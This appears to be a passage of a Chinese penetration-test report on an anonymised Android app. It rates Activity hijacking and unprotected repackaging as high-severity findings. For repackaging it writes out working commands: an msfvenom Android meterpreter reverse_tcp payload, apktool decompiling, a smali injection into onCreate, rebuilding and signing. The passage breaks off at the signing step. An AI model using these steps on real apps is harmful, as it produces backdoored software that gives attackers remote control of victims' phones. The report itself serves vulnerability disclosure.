<td width="157" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:117.45pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>系统名称</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
<td width="113" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:3.0cm;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>漏洞名称</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
<td width="104" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:77.95pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>漏洞危害</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
<td width="119" style="background:#D9D9D9;border:solid windowtext 1.0pt;border-left:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:89.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>修复结果</strong></span></b><b><span lang="EN-US" style="font-family:宋体;"></span></b>
</p>
</td>
</tr>
<tr style="height:1.0cm;">
<td width="60" style="border:solid windowtext 1.0pt;border-top:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:45.35pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>1</strong></span>
</p>
</td>
<td width="157" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:117.45pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<a name="_Hlk37346847"></a><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span><span><span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">某某某</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span></span></span><span lang="EN-US" style="font-family:宋体;"></span>
</p>
</td>
<td width="113" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:3.0cm;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>Activity </strong></span><span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">劫持</span></strong><span lang="EN-US"></span></span>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span>
</p>
</td>
<td width="104" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:77.95pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">高</span></strong><span lang="EN-US"></span></span>
</p>
</td>
<td width="119" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:1.0cm;padding:0cm 5.4pt 0cm 5.4pt;width:89.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span>
</p>
</td>
</tr>
<tr style="height:60.95pt;">
<td width="60" style="border:solid windowtext 1.0pt;border-top:none;height:60.95pt;padding:0cm 5.4pt 0cm 5.4pt;width:45.35pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>2</strong></span>
</p>
</td>
<td width="157" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:60.95pt;padding:0cm 5.4pt 0cm 5.4pt;width:117.45pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span><span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">某某某</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span></span><span lang="EN-US" style="font-family:宋体;"></span>
</p>
</td>
<td width="113" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:60.95pt;padding:0cm 5.4pt 0cm 5.4pt;width:3.0cm;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">反编译二次打包捆绑木马、篡改</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span><strong><span style="line-height:2;font-size:16px;">代码</span></strong></span><span lang="EN-US" style="font-family:宋体;"></span>
</p>
</td>
<td width="104" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:60.95pt;padding:0cm 5.4pt 0cm 5.4pt;width:77.95pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-family:宋体;"><strong><span style="line-height:2;font-size:16px;">高</span></strong><span lang="EN-US"></span></span>
</p>
</td>
<td width="119" style="border-bottom:solid windowtext 1.0pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:none;height:60.95pt;padding:0cm 5.4pt 0cm 5.4pt;width:89.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong> </strong></span>
</p>
</td>
</tr>
</tbody>
</table>
</div>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span>
</p>
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:center;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="font-family:宋体;line-height:2;font-size:16px;"><strong>表</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>1-2 </strong></span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>测试结果</strong></span><span lang="EN-US" style="line-height:150%;"></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
<h1 style="tab-stops:right 415.6pt;">
<a name="_Toc37350240"></a><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>2 </strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>检测结果</strong></span></span><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong> </strong></span></span>
</h1>
<h2>
<a name="_Toc37350241"></a><span lang="EN-US" style="font-family:宋体;line-height:2;font-size:16px;"><strong>2.1 </strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span></span><span lang="EN-US" style="font-family:宋体;"></span>
</h2>
<h3>
<a name="_Toc37350242"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>2.1.1</strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>检测目标</strong></span></span><span lang="EN-US"></span>
</h3>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="font-family:宋体;font-size:16px;line-height:2;"><strong>目标地址:</strong></span> <span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span><span style="font-family:宋体;line-height:150%;"><strong><span style="line-height:2;font-size:16px;">某某某</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span></span><span lang="EN-US"></span>
</p>
<h3>
<a name="_Toc37350243"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>2.1.2</strong></span><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>检测结果</strong></span></span><span lang="EN-US" style="font-family:宋体;"></span>
</h3>
<h4>
<a name="_Toc456956544"></a><a name="_Toc37350244"></a><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>2.1.2.1</strong></span></span><span><span lang="EN-US"> </span></span><span lang="EN-US"></span>
</h4>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>漏洞链接地址:</strong></span></b><a name="_Hlk37347444"></a><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span><span><span style="font-family:宋体;line-height:150%;"><strong><span style="line-height:2;font-size:16px;">某某某</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span></span></span><span></span><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>漏洞分析及取证:</strong></span></b><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong> </strong></span></span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>通过</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>androidkiiler</strong></span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>反编译,发现</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>app</strong></span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>未进行安全加固,</strong></span><span> </span><span lang="EN-US" style="color:black;font-family:MicrosoftYaHei, serif;font-size:16px;line-height:2;"><strong>Activity </strong></span><span style="color:black;font-family:宋体;font-size:16px;line-height:2;"><strong>为</strong></span><span lang="EN-US" style="color:black;font-family:MicrosoftYaHei, serif;font-size:16px;line-height:2;"><strong>com.minivision.cmcc.activity.SubActivity</strong></span><span style="color:black;font-family:宋体;font-size:16px;line-height:2;"><strong>可被劫持,复现漏洞如图:</strong></span><span lang="EN-US"></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span lang="EN-US"><span style="line-height:2;font-size:16px;"><strong> </strong></span><span style="line-height:2;font-size:16px;"><strong> </strong></span><img width="453" height="294" src="https://www.2k8.org/content/uploadfile/202206/08/1173e93e.png" alt="" style="vertical-align:middle;" /></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span lang="EN-US"><span style="line-height:2;font-size:16px;"><strong> </strong></span><span style="line-height:2;font-size:16px;"><strong> </strong></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<img width="476" height="214" src="https://www.2k8.org/content/uploadfile/202206/08/090f3ede.png" alt="" style="vertical-align:middle;" /><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><img width="482" height="209" src="https://www.2k8.org/content/uploadfile/202206/08/cf0fdc46.png" alt="" style="vertical-align:middle;" /></b><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><img width="488" height="216" src="https://www.2k8.org/content/uploadfile/202206/08/ed417e0f.png" alt="" style="vertical-align:middle;" /></b><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>漏洞危害:高</strong></span></b><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<div align="center">
<table border="1" cellpadding="0" cellspacing="0" width="552" style="border:none;border-collapse:collapse;font-family:Calibri,sans-serif;font-size:10.5pt;">
<thead>
<tr>
<td width="104" style="background:#CCCCCC;border:solid windowtext 1.5pt;border-right:solid windowtext 1.0pt;padding:0cm 5.4pt 0cm 5.4pt;width:78.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>严重程度</strong></span><span lang="EN-US"></span>
</p>
</td>
<td width="79" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:59.3pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<b><span style="color:red;font-family:宋体;line-height:2;font-size:16px;"><strong>高</strong></span></b><b><span lang="EN-US" style="color:red;"></span></b>
</p>
</td>
<td width="72" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:53.8pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:red;font-family:宋体;line-height:2;font-size:16px;"><strong>■</strong></span><b><span lang="EN-US" style="color:red;"></span></b>
</p>
</td>
<td width="76" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:57.05pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="color:black;font-family:宋体;line-height:2;font-size:16px;"><strong>中</strong></span><span lang="EN-US" style="color:black;"></span>
</p>
</td>
<td width="75" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:56.2pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="color:#FFC000;line-height:2;font-size:16px;"><strong> </strong></span>
</p>
</td>
<td width="72" style="border-bottom:solid windowtext 1.5pt;border-left:none;border-right:solid windowtext 1.0pt;border-top:solid windowtext 1.5pt;padding:0cm 5.4pt 0cm 5.4pt;width:53.7pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span style="font-family:宋体;line-height:2;font-size:16px;"><strong>低</strong></span><span lang="EN-US"></span>
</p>
</td>
<td width="74" style="border:solid windowtext 1.5pt;border-left:none;padding:0cm 5.4pt 0cm 5.4pt;width:55.65pt;">
<p align="center" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:center;text-justify:inter-ideograph;">
<span lang="EN-US" style="line-height:2;font-size:16px;"><strong> </strong></span>
</p>
</td>
</tr>
</thead>
</table>
</div>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>修复方法:在</strong></span></b><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> APP </strong></span></b><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>的</strong></span></b><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> Activity </strong></span></b><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>界面(也就是</strong></span></b><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> MainActivity</strong></span></b><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>)中重写</strong></span></b><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> onKeyDown </strong></span></b><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>方法和</strong></span></b><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> onPause </strong></span></b><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或</strong></span></b><b><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> HOME </strong></span></b><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。</strong></span></b><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<b><span lang="EN-US" style="font-size:16px;line-height:2;"><span style="line-height:2;font-size:16px;"><strong> </strong></span></span></b><a name="_Toc456956556"></a><a name="_Toc457786870"></a><span><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="font-size:16px;line-height:2;"><strong> </strong></span></span></span>
</p>
<h4>
<span><span><a name="_Toc37350245"></a><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>2.1.2.2</strong></span><span lang="EN-US"> </span></span></span>
</h4>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>漏洞链接地址:</strong></span></b></span></span><span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>某某某</strong></span></span></span><span><span><span style="font-family:宋体;line-height:150%;"><strong><span style="line-height:2;font-size:16px;">某某某</span></strong><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>APP</strong></span></span></span></span><span><span><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></span></span>
</p>
<p style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:justify;text-indent:18.0pt;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><b><span style="font-family:宋体;font-size:16px;line-height:2;"><strong>漏洞分析及取证:</strong></span></b></span></span><span><span><b><span lang="EN-US" style="font-size:12.0pt;line-height:150%;"></span></b></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><strong> </strong></span></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>app</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>代码捆绑木马或者植入广告等操作,复现详细方法如下:</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;line-height:150%;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>用</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>Metasploit </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>生成木马</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>反编译目标</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apk</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>和木马</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span lang="EN-US"><strong><span style="line-height:2;font-size:16px;">apktool d target.apk</span></strong><br />
<strong><span style="line-height:2;font-size:16px;"> apktool d cockhorse.apk</span></strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>木马</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> apk </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>注入目标</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;margin-left:36.0pt;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>在目标</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> apk </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>反编译生成的文件中找到启动</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> Activity </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>的</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> smali </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>文件,并在</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> onCreate()</strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方法中添加如下代码:</strong></span><span lang="EN-US"><br />
<strong><span style="line-height:2;font-size:16px;"> invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V</span></strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;margin-left:36.0pt;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>将木马文件</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> AndroidManifest.xml </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>中的权限放到目标文件</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> AndroidManifest.xml </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>中,去除重复</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;margin-left:36.0pt;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>将木马文件的</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> smali </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>文件放到目标文件下,例如</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> com/metasploit </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>文件复制到目标文件</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> com/ </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>下</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>回编译生成最终</strong></span><span lang="EN-US" style="line-height:2;font-size:16px;"><strong> apk</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>重新打包</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>apktool b -o repackage.apk target_app_floder</strong></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>创建签名文件,有的话可忽略此步骤</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
<span><span><span lang="EN-US"><strong><span style="line-height:2;font-size:16px;">keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000</span></strong><span style="line-height:2;font-size:16px;"><strong> </strong></span></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>签名,以下任选其一</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;text-align:left;text-justify:inter-ideograph;">
<span style="line-height:2;font-size:16px;"><span style="line-height:2;font-size:16px;"><span lang="EN-US" style="line-height:2;font-size:16px;"><strong>jarsigner </strong></span></span></span><span><span><span style="font-family:宋体;line-height:2;font-size:16px;"><strong>方式</strong></span><span lang="EN-US"></span></span></span>
</p>
<p align="left" style="font-family:Calibri,sans-serif;font-size:10.5pt;margin:0cm;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;text-align:left;text-justify:inter-ideograph;">
